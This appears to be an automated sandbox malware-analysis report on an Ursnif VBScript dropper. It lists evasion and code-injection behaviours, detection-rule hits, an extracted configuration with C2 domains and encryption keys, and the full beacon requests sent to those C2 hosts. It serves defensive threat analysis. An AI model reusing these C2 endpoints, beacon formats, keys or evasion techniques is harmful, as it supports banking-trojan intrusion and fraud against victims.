Windows Analysis Report presentation[2021.09.09_15-26].vbs

Overview

General Information

Sample Name: presentation[2021.09.09_15-26].vbs
Analysis ID: 482024
MD5: 783f03c1b5f346544c131ea2b164e54d
SHA1: 9100e6d4ce0edfcb161552fdf2721835f12470a2
SHA256: 683fbb9eb6fd6a0a2bab8471d1be28bd45f0598e1db19dc3f6d7536f1c4b5e8b
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malware configuration
Sigma detected: Powershell run code from registry
Benign windows process drops PE files
Sigma detected: Encoded IEX
Multi AV Scanner detection for dropped file
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Compiles code for process injection (via .Net compiler)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Allocates memory in foreign processes
Sigma detected: MSHTA Spawning Windows Shell
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Writes to foreign memory regions
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the import address table of user mode modules (user mode IAT hooks)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Queries the installation date of Windows
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Java / VBScript file with very long strings (likely obfuscated code)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Launches processes in debugging mode, may be used to hinder debugging
Compiles C# or VB.Net code
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://atl.bigbigpoppa.com/_2Bd0AwZG9XFE1JsQD/cYUPvk3qo/ww4_2FJnUCtl_2FACzcA/gxGADMlKA5cRRoa6VfN/bztGPiRkqBO_2FeJB_2BBD/IZBC0D711zpQe/9l1y4Uwd/xWWDr7ndPnPsd3SHIlHFSP9/fiR_2F5_2B/KN2_2B_2B5ItX8nNz/A90VzmqpXUKU/D_2BBXI_2Fv/Sm1xwqkwGWKzxN/PYriFQN1XTg1Mt_2Fdo2G/CZqhw6Gkw9Ga7J6_/2Bpy6_2BqUSt_2F/vDyCdPXYj3I1xnWURR/qEzCiHG74/IyTcmp76Fgjy6Le_2BYj/rD_2FzgWNQQxd_2BIyQ/7fmZMqR3a8eHDmZNS7_2Fe/dWNBCQOVIE_2F/6naTDq9tL/Nw Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/ls0YKrv_/2BJV6E5mlJLydgYjyupmqAO/ebshbxfLmK/53ueumhRK5uHsu1wq/kpnvHeT3BjeE/FCqvgS3hqwT/mPkNYDb32X1Qkc/N7G1r4IU6bUFNgu5BVVbX/yjbVABqaYeB8_2B_/2Fc9vKfZ4hMWLC_/2F14B5QvoOUabGWCw8/plYcnGyms/aXOFWp0J_2FK_2F8o_2B/CI_2FWn_2BX374n3ww4/TG_2ByfgHphR5COejTHsMy/gz3rKYS9XKGwv/EDh6_2Fg/2ikTmUt7QTCri3TRpRtQJWb/r2fO6KX7SN/6mXIe2jQ1oyEIqRjM/CLsIWaugZB_2/FhqkmGlAeUa/nn8rVI84Q/hCoKY5 Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/fLZmMbWHBrDjVjdoP/PBIC_2FBgMAC/GLBRSVYh_2B/gOgSU0YMdVq_2B/zcwHoIWkheDXq9xczsBhd/ElAduBsByQvdzYtm/u1rHkcLjXfXx1mz/65IOgBlAGjO7Q3M6vt/veJ56XC29/VYs86CKFiCgfUKe_2BfC/Owi_2FUGONT8UvwdsM8/JqV4Jr0011ZtMPmdvDnIrg/UTgh1kCejVnav/Uy_2FGvp/eeZw5tLTiHgf8fP7rzbZynm/BFygaGjj9P/SHhlv5Dn_2B4k8NOM/1M_2FM_2BW8G/dlVQieXVKAn/Zjy1O5qAJEGMC1/sQMiemHb82h85qSPQL4KI/K6v7yXzTOl7hZz/W Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000015.00000003.1057194752.0000000004AB0000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "IAodzSkRRXZVbpA8JuABjuUBQvpHiTpdg9dOAQp7bBw4t0xkkPvGywDaeciS3HngU/RkNYsOricM2S0LVvdwWlSJ6FdKpFt6YFFWOrsBfCiNFCtU5v/Ohii1LI6H4/OB/132O4comC2he+ED1d47BeoZGdamjIEdPypU4ReJbSLrCxcRMW03mJzNzM22WWjes9V+fVfZ8lvnVONnlm+2SejHIEhpJMv4VzqUiuRgWDBCh1ovNzO3eDJUiuSU1jFcdmg2ywuZOyDLXh6uuRZonMVTxMoziZw6y80jGvuwDFFQy5TMx6xbKoXdqNSwE60TugFay/vbpOuG0fp4zORCVEe39fTGD2o0Gttx0E5BI4w=", "c2_domain": ["atl.bigbigpoppa.com", "pop.urlovedstuff.com"], "botnet": "2500", "server": "580", "serpent_key": "Do9L8DmcVMtyFi6j", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\fum.cpp ReversingLabs: Detection: 55%

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC3276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 21_2_04BC3276
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.pdbXP source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.pdbXP source: powershell.exe, 00000019.00000002.1238604024.000001B6D76F8000.00000004.00000001.sdmp
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.1013379730.000001BA25DFD000.00000004.00000001.sdmp, rundll32.exe, 00000015.00000002.1193389238.000000006FBF4000.00000002.00020000.sdmp, fum.cpp.0.dr
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.pdb source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000015.00000003.1171105183.00000000063F0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000015.00000003.1171105183.00000000063F0000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.pdb source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E61802 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 21_2_05E61802
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E51577 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 21_2_05E51577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E414A0 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 21_2_05E414A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E56E4E lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 21_2_05E56E4E

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49833 -> 188.127.235.42:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49833 -> 188.127.235.42:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49834 -> 188.127.235.42:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49834 -> 188.127.235.42:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49835 -> 188.127.235.42:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49835 -> 188.127.235.42:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49836 -> 188.127.235.42:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49836 -> 188.127.235.42:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 188.127.235.42 80 Jump to behavior
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /_2Bd0AwZG9XFE1JsQD/cYUPvk3qo/ww4_2FJnUCtl_2FACzcA/gxGADMlKA5cRRoa6VfN/bztGPiRkqBO_2FeJB_2BBD/IZBC0D711zpQe/9l1y4Uwd/xWWDr7ndPnPsd3SHIlHFSP9/fiR_2F5_2B/KN2_2B_2B5ItX8nNz/A90VzmqpXUKU/D_2BBXI_2Fv/Sm1xwqkwGWKzxN/PYriFQN1XTg1Mt_2Fdo2G/CZqhw6Gkw9Ga7J6_/2Bpy6_2BqUSt_2F/vDyCdPXYj3I1xnWURR/qEzCiHG74/IyTcmp76Fgjy6Le_2BYj/rD_2FzgWNQQxd_2BIyQ/7fmZMqR3a8eHDmZNS7_2Fe/dWNBCQOVIE_2F/6naTDq9tL/Nw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /ls0YKrv_/2BJV6E5mlJLydgYjyupmqAO/ebshbxfLmK/53ueumhRK5uHsu1wq/kpnvHeT3BjeE/FCqvgS3hqwT/mPkNYDb32X1Qkc/N7G1r4IU6bUFNgu5BVVbX/yjbVABqaYeB8_2B_/2Fc9vKfZ4hMWLC_/2F14B5QvoOUabGWCw8/plYcnGyms/aXOFWp0J_2FK_2F8o_2B/CI_2FWn_2BX374n3ww4/TG_2ByfgHphR5COejTHsMy/gz3rKYS9XKGwv/EDh6_2Fg/2ikTmUt7QTCri3TRpRtQJWb/r2fO6KX7SN/6mXIe2jQ1oyEIqRjM/CLsIWaugZB_2/FhqkmGlAeUa/nn8rVI84Q/hCoKY5 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /fLZmMbWHBrDjVjdoP/PBIC_2FBgMAC/GLBRSVYh_2B/gOgSU0YMdVq_2B/zcwHoIWkheDXq9xczsBhd/ElAduBsByQvdzYtm/u1rHkcLjXfXx1mz/65IOgBlAGjO7Q3M6vt/veJ56XC29/VYs86CKFiCgfUKe_2BfC/Owi_2FUGONT8UvwdsM8/JqV4Jr0011ZtMPmdvDnIrg/UTgh1kCejVnav/Uy_2FGvp/eeZw5tLTiHgf8fP7rzbZynm/BFygaGjj9P/SHhlv5Dn_2B4k8NOM/1M_2FM_2BW8G/dlVQieXVKAn/Zjy1O5qAJEGMC1/sQMiemHb82h85qSPQL4KI/K6v7yXzTOl7hZz/W HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /J7vFZ3DnKfP9_2BLqsOzhE/_2B0sX39iqKXX/xRC3_2Bn/FR7I7tC4Y_2BKbKZhTipXKo/Y68Clp5syo/AKjqJkiRp4I9iXaE1/6hTqbwupKV0Z/G7JGvRt1lPU/_2FoM5FRPpNFQ7/Q0DKQKOrk_2B_2BMtgkLi/AHH7yDMmOl_2BC_2/Bw6mGTTnqH2yR_2/BWwJ_2BspWSt3ypb_2/B3jzGWYjP/wQws_2BBySwRC_2FSzoA/9eCjcMJ9yhEG_2BMBin/PBuDF_2BwHt7nPiirKF3ia/yI6rUSMPL1t1W/Tqi6oYDf/4qfPSjhH9hVkFRq5vohLKMn/uKsZDY_2Bm7_2FTYT00/CD HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at
Source: global traffic HTTP traffic detected: POST /0QTFQ19LsLPPw2WV1xJ/YcBhtZLzUs6CSioSs9dLnb/aEb6zuvJhqdcs/1Hb1sg90/RWaFAF1NEpmrckuTWKaPqAA/24G0Hczqd6/RbhQoaSPqBLCdZu1n/MpE8YBnCkgqe/EyYs8PTQfhS/e3P4PnLK5TJvEZ/zj0oBbuVnCwlxQAQ_2FhY/0Zu1rFoV_2B4IBxL/S0k_2BzfYQGXk4l/RlIY9NCU_2Bq2C0qZR/XkIkWaJBq/tdpiFuEgu5qCEOsijppu/WtAIhPYjfYVFXMRTyYR/vZDnI_2BfmuNdCFB6L924B/9580GsWQ3CLj4/gdGO_2FS/6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DHUBRU DHUBRU
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Sep 2021 09:05:28 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: rundll32.exe, 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, control.exe, 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, control.exe, 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000019.00000003.1134490051.000001B6EB600000.00000004.00000001.sdmp String found in binary or memory: http://crl.m-
Source: rundll32.exe, 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, control.exe, 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000019.00000002.1218191290.000001B6D2FF0000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000019.00000002.1216995781.000001B6D2DE1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000019.00000002.1218191290.000001B6D2FF0000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000019.00000002.1218191290.000001B6D2FF0000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown DNS traffic detected: queries for: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /_2Bd0AwZG9XFE1JsQD/cYUPvk3qo/ww4_2FJnUCtl_2FACzcA/gxGADMlKA5cRRoa6VfN/bztGPiRkqBO_2FeJB_2BBD/IZBC0D711zpQe/9l1y4Uwd/xWWDr7ndPnPsd3SHIlHFSP9/fiR_2F5_2B/KN2_2B_2B5ItX8nNz/A90VzmqpXUKU/D_2BBXI_2Fv/Sm1xwqkwGWKzxN/PYriFQN1XTg1Mt_2Fdo2G/CZqhw6Gkw9Ga7J6_/2Bpy6_2BqUSt_2F/vDyCdPXYj3I1xnWURR/qEzCiHG74/IyTcmp76Fgjy6Le_2BYj/rD_2FzgWNQQxd_2BIyQ/7fmZMqR3a8eHDmZNS7_2Fe/dWNBCQOVIE_2F/6naTDq9tL/Nw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /ls0YKrv_/2BJV6E5mlJLydgYjyupmqAO/ebshbxfLmK/53ueumhRK5uHsu1wq/kpnvHeT3BjeE/FCqvgS3hqwT/mPkNYDb32X1Qkc/N7G1r4IU6bUFNgu5BVVbX/yjbVABqaYeB8_2B_/2Fc9vKfZ4hMWLC_/2F14B5QvoOUabGWCw8/plYcnGyms/aXOFWp0J_2FK_2F8o_2B/CI_2FWn_2BX374n3ww4/TG_2ByfgHphR5COejTHsMy/gz3rKYS9XKGwv/EDh6_2Fg/2ikTmUt7QTCri3TRpRtQJWb/r2fO6KX7SN/6mXIe2jQ1oyEIqRjM/CLsIWaugZB_2/FhqkmGlAeUa/nn8rVI84Q/hCoKY5 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /fLZmMbWHBrDjVjdoP/PBIC_2FBgMAC/GLBRSVYh_2B/gOgSU0YMdVq_2B/zcwHoIWkheDXq9xczsBhd/ElAduBsByQvdzYtm/u1rHkcLjXfXx1mz/65IOgBlAGjO7Q3M6vt/veJ56XC29/VYs86CKFiCgfUKe_2BfC/Owi_2FUGONT8UvwdsM8/JqV4Jr0011ZtMPmdvDnIrg/UTgh1kCejVnav/Uy_2FGvp/eeZw5tLTiHgf8fP7rzbZynm/BFygaGjj9P/SHhlv5Dn_2B4k8NOM/1M_2FM_2BW8G/dlVQieXVKAn/Zjy1O5qAJEGMC1/sQMiemHb82h85qSPQL4KI/K6v7yXzTOl7hZz/W HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /J7vFZ3DnKfP9_2BLqsOzhE/_2B0sX39iqKXX/xRC3_2Bn/FR7I7tC4Y_2BKbKZhTipXKo/Y68Clp5syo/AKjqJkiRp4I9iXaE1/6hTqbwupKV0Z/G7JGvRt1lPU/_2FoM5FRPpNFQ7/Q0DKQKOrk_2B_2BMtgkLi/AHH7yDMmOl_2BC_2/Bw6mGTTnqH2yR_2/BWwJ_2BspWSt3ypb_2/B3jzGWYjP/wQws_2BBySwRC_2FSzoA/9eCjcMJ9yhEG_2BMBin/PBuDF_2BwHt7nPiirKF3ia/yI6rUSMPL1t1W/Tqi6oYDf/4qfPSjhH9hVkFRq5vohLKMn/uKsZDY_2Bm7_2FTYT00/CD HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at
Source: unknown HTTP traffic detected: POST /0QTFQ19LsLPPw2WV1xJ/YcBhtZLzUs6CSioSs9dLnb/aEb6zuvJhqdcs/1Hb1sg90/RWaFAF1NEpmrckuTWKaPqAA/24G0Hczqd6/RbhQoaSPqBLCdZu1n/MpE8YBnCkgqe/EyYs8PTQfhS/e3P4PnLK5TJvEZ/zj0oBbuVnCwlxQAQ_2FhY/0Zu1rFoV_2B4IBxL/S0k_2BzfYQGXk4l/RlIY9NCU_2Bq2C0qZR/XkIkWaJBq/tdpiFuEgu5qCEOsijppu/WtAIhPYjfYVFXMRTyYR/vZDnI_2BfmuNdCFB6L924B/9580GsWQ3CLj4/gdGO_2FS/6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000015.00000003.1100831932.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097126029.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097248260.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097156234.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1178938192.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097185977.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097225716.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097283225.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1222209287.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1179057406.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1178835600.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097297117.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097267626.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1105474660.000000000568C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4504, type: MEMORYSTR
Source: Yara match File source: 21.3.rundll32.exe.5838d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.578a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.58094a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.578a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000000.1176959045.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.1173339392.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1103640775.0000000005809000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.1175334626.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1221119443.0000000000C91000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.1192551182.000000000550F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1103580587.000000000578A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000015.00000003.1100831932.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097126029.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097248260.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097156234.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1178938192.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097185977.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097225716.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097283225.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1222209287.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1179057406.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1178835600.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097297117.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097267626.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1105474660.000000000568C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4504, type: MEMORYSTR
Source: Yara match File source: 21.3.rundll32.exe.5838d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.578a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.58094a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.578a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000000.1176959045.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.1173339392.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
